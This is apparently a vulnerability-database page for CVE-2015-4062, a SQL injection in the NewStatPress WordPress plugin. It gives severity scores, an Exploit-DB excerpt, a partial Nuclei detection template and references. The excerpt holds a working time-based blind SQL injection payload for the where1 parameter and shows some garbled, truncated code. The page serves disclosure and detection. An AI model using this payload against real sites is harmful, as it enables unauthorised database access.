CVE-2015-4062
published 2015-05-27CVE-2015-4062: SQL injection vulnerability in includes/nsp_search.php in the NewStatPress plugin before 0.9.9 for WordPress allows remote authenticated users to execute…
PriorityP347medium6.5CVSS 2.0
AVNACLAuSCPIPAP
EXPLOIT
EPSS
9.18%
94.7th percentile
SQL injection vulnerability in includes/nsp_search.php in the NewStatPress plugin before 0.9.9 for WordPress allows remote authenticated users to execute arbitrary SQL commands via the where1 parameter in the nsp_search page to wp-admin/admin.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| newstatpress_project | newstatpress | <= 0.9.8 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
WordPress Plugin NewStatPress 0.9.8 - Multiple Vulnerabilities
exploitdb·2015-05-26·CVSS 6.5
CVE-2015-4063 [MEDIUM] WordPress Plugin NewStatPress 0.9.8 - Multiple Vulnerabilities
WordPress Plugin NewStatPress 0.9.8 - Multiple Vulnerabilities
---
# Title: Multiple vulnerabilities in WordPress plugin "NewStatPress"
# Author: Adrián M. F. - adrimf85[at]gmail[dot]com
# Date: 2015-05-25
# Vendor Homepage: https://wordpress.org/plugins/newstatpress/
# Active installs: 20,000+
# Vulnerable version: 0.9.8
# Fixed version: 0.9.9
# CVE: CVE-2015-4062, CVE-2015-4063
Vulnerabilities (2)
(1) Authenticated SQLi [CWE-89] (CVE-2015-4062)
* CODE:
includes/nsp_search.php:94
+++++++++++++++++++++++++++++++++++++++++
for($i=1;$i= 5.0.12 AND time-based blind (SELECT)
Payload: where1=agent AND (SELECT * FROM (SELECT(SLEEP(5)))Guji)&limitquery=1&searchsubmit=Buscar&page=nsp_search
---
[12:25:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
Nuclei
WordPress NewStatPress 0.9.8 - SQL Injection
nuclei·CVSS 6.5
CVE-2015-4062 [MEDIUM] WordPress NewStatPress 0.9.8 - SQL Injection
WordPress NewStatPress 0.9.8 - SQL Injection
WordPress NewStatPress 0.9.8 plugin contains a SQL injection vulnerability in includes/nsp_search.php. A remote authenticated user can execute arbitrary SQL commands via the where1 parameter in the nsp_search page to wp-admin/admin.php.
Template:
id: CVE-2015-4062
info:
name: WordPress NewStatPress 0.9.8 - SQL Injection
author: r3Y3r53
severity: medium
description: |
WordPress NewStatPress 0.9.8 plugin contains a SQL injection vulnerability in includes/nsp_search.php. A remote authenticated user can execute arbitrary SQL commands via the where1 parameter in the nsp_search page to wp-admin/admin.php.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unautho
No writeups or analysis indexed.
http://packetstormsecurity.com/files/132038/WordPress-NewStatPress-0.9.8-Cross-Site-Scripting-SQL-Injection.htmlhttp://www.securityfocus.com/bid/74773https://wordpress.org/plugins/newstatpress/changelog/https://www.exploit-db.com/exploits/37107/http://packetstormsecurity.com/files/132038/WordPress-NewStatPress-0.9.8-Cross-Site-Scripting-SQL-Injection.htmlhttp://www.securityfocus.com/bid/74773https://wordpress.org/plugins/newstatpress/changelog/https://www.exploit-db.com/exploits/37107/
2015-05-27
Published